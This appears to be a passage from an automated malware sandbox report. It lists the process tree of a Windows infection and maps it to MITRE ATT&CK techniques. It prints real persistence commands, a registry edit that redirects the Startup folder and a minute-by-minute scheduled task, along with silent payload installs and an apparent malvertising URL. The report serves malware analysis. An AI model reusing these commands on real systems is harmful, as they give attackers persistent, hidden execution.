- Loads dropped DLL
PID:1416
- C:\Users\Admin\AppData\Local\Temp\is-SSD7R.tmp\lakazet.exe
  "C:\Users\Admin\AppData\Local\Temp\is-SSD7R.tmp\lakazet.exe" /S /UID=2720
  2⤵
  PID:3620
- - C:\Users\Admin\AppData\Local\Temp\82-94900-820-4dbb1-ca0738f37f6bd\ZHamolodaeho.exe
    "C:\Users\Admin\AppData\Local\Temp\82-94900-820-4dbb1-ca0738f37f6bd\ZHamolodaeho.exe"
    3⤵
    PID:5192
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
      4⤵
      PID:5204
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc966546f8,0x7ffc96654708,0x7ffc96654718
        5⤵
        
        PID:1184
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2
        5⤵
        
        PID:6360
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2616 /prefetch:8
        5⤵
        
        PID:6520
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3
        5⤵
        
        PID:6448
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
        5⤵
        
        PID:6896
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
        5⤵
        
        PID:6248
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:1
        5⤵
        
        PID:3372
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
        5⤵
        
        PID:6756
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
        5⤵
        
        PID:4496
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3688 /prefetch:8
        5⤵
        
        PID:1068
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3688 /prefetch:8
        5⤵
        
        PID:6584
- - C:\Users\Admin\AppData\Local\Temp\b5-385e9-5be-60582-d13ddd9def15c\Lopycalyto.exe
    "C:\Users\Admin\AppData\Local\Temp\b5-385e9-5be-60582-d13ddd9def15c\Lopycalyto.exe"
    3⤵
    PID:4112
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\djkaumtu.3r0\installer.exe /qn CAMPAIGN="654" & exit
      4⤵
      PID:4200
    - - C:\Users\Admin\AppData\Local\Temp\djkaumtu.3r0\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\djkaumtu.3r0\installer.exe /qn CAMPAIGN="654"
        5⤵
        
        PID:5504
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ygpwmboh.0vm\any.exe & exit
      4⤵
      PID:1448
    - - C:\Users\Admin\AppData\Local\Temp\ygpwmboh.0vm\any.exe
        
        C:\Users\Admin\AppData\Local\Temp\ygpwmboh.0vm\any.exe
        5⤵
        
        PID:6496
      - C:\Users\Admin\AppData\Local\Temp\ygpwmboh.0vm\any.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ygpwmboh.0vm\any.exe" -u
        6⤵
        
        PID:4376
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yxscqur1.0pp\autosubplayer.exe /S & exit
      4⤵
      PID:7088
    - - C:\Users\Admin\AppData\Local\Temp\yxscqur1.0pp\autosubplayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\yxscqur1.0pp\autosubplayer.exe /S
        5⤵
        
        PID:7044
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbAAC5.tmp\tempfile.ps1"
        6⤵
        
        PID:3980
- - C:\Program Files\MSBuild\ZOMALTLCEV\foldershare.exe
    "C:\Program Files\MSBuild\ZOMALTLCEV\foldershare.exe" /VERYSILENT
    3⤵
    PID:4288

C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07bb82f51727fc79.exe
Sun07bb82f51727fc79.exe
1⤵
- Executes dropped EXE
PID:5108
- C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe
  "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"
  2⤵
  - Executes dropped EXE
  PID:1380
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\
    3⤵
    PID:5456
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\
      4⤵
      PID:2380
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:5580
- - C:\Users\Admin\AppData\Local\Temp\soul3ss_crypted\soul3ss_crypted.exe
    "C:\Users\Admin\AppData\Local\Temp\soul3ss_crypted\soul3ss_crypted.exe"
    3⤵
    PID:2208

C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07610e6b216b74271.exe
Sun07610e6b216b74271.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3500
- C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07610e6b216b74271.exe
  C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07610e6b216b74271.exe
  2⤵
  PID:3048

C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07d46efb4bd1.exe
Sun07d46efb4bd1.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:852
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 1872
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  PID:5732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4556 -ip 4556
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 852 -ip 852
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5552

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6124
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:2940
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2940 -s 448
    3⤵
    - Program crash
    PID:5856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2940 -ip 2940
1⤵
PID:5396

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 596 -p 4820 -ip 4820
1⤵
PID:5200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5984 -ip 5984
1⤵
PID:5412

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 512 -p 6132 -ip 6132
1⤵
PID:5800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2208 -ip 2208
1⤵
PID:5680

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 496 -p 5280 -ip 5280
1⤵
PID:5340

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 604 -p 1592 -ip 1592
1⤵
PID:5252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5512 -ip 5512
1⤵
PID:5880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2208 -ip 2208
1⤵
PID:6032

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 556 -p 5304 -ip 5304
1⤵
PID:1392

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:1728
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:4024
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 448
    3⤵
    - Program crash
    PID:5880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4024 -ip 4024
1⤵
PID:5884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5680 -ip 5680
1⤵
PID:1816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1108 -ip 1108
1⤵
PID:2468

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
1⤵
- Executes dropped EXE
PID:3620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6068 -ip 6068
1⤵
PID:6080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5252 -ip 5252
1⤵
PID:2008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 6140 -ip 6140
1⤵
PID:5476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4228 -ip 4228
1⤵
PID:2776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4736 -ip 4736
1⤵
PID:4148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5584 -ip 5584
1⤵
PID:1068

C:\Users\Admin\AppData\Local\Temp\5705.exe
C:\Users\Admin\AppData\Local\Temp\5705.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5308
- C:\Users\Admin\AppData\Local\Temp\5705.exe
  C:\Users\Admin\AppData\Local\Temp\5705.exe
  2⤵
  PID:5584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2464 -ip 2464
1⤵
PID:3436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 4508 -ip 4508
1⤵
PID:5320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1604 -ip 1604
1⤵
PID:7004

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5796

C:\Users\Admin\AppData\Local\Temp\A035.exe
C:\Users\Admin\AppData\Local\Temp\A035.exe
1⤵
PID:6704
- C:\Users\Admin\AppData\Local\Temp\A035.exe
  C:\Users\Admin\AppData\Local\Temp\A035.exe
  2⤵
  PID:6424

C:\Users\Admin\AppData\Local\Temp\C292.exe
C:\Users\Admin\AppData\Local\Temp\C292.exe
1⤵
PID:3340
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 296
  2⤵
  - Program crash
  PID:5628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\EA7E.exe
C:\Users\Admin\AppData\Local\Temp\EA7E.exe
1⤵
PID:7016
- C:\Users\Admin\AppData\Local\Temp\EA7E.exe
  C:\Users\Admin\AppData\Local\Temp\EA7E.exe
  2⤵
  PID:1416

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:6296
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 142A9FF888478E637E204336A33F3F4B C
  2⤵
  PID:1312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3340 -ip 3340
1⤵
PID:6028

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6036
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5776
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 448
    3⤵
    - Program crash
    PID:3960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5776 -ip 5776
1⤵
PID:4400

C:\Users\Admin\AppData\Local\Temp\313D.exe
C:\Users\Admin\AppData\Local\Temp\313D.exe
1⤵
PID:452

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

System Information Discovery